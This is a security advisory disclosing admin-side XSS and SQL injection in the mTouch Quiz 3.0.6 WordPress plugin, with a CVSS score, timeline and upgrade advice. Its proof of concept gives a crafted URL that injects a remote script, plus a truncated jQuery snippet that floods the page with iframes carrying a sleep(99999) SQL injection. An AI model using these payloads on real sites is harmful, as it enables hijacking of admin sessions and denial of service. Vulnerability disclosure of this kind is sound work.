Admin XSS and SQLi in mTouch Quiz 3.0.6


Last revised:

There are two unescaped outputtings of a GET parameter and one unescaped SQL query using the same GET parameter in question.php (lines 87, 94, and 117, respectively).

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 9 High
Vector Network
Complexity Medium
Authentication None
Confidentiality Complete
Integrity Partial
Availability Complete
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

  1. Create a JavaScript file (see below), and assume you’ve hosted it at
  2. Direct a logged-in admin to http://localhost/wp-admin/edit.php?page=mtouch-quiz/question.php&quiz=%3Cscript%20src=
jQuery(function ($) {
    for (var i = 0; i <= 20; i++) {
        $('body').append('<iframe src="/wp-admin/edit.php?page=mtouch-quiz/question.php&quiz=sleep(99999)&a='+i+'"></iframe>')

Advisory timeline

  • 2013-08-09: Discovered
  • 2014-02-26: Reported
  • 2014-03-17: Updated version discovered which reports issue fixed.

Mitigation/further actions

Upgrade immediately.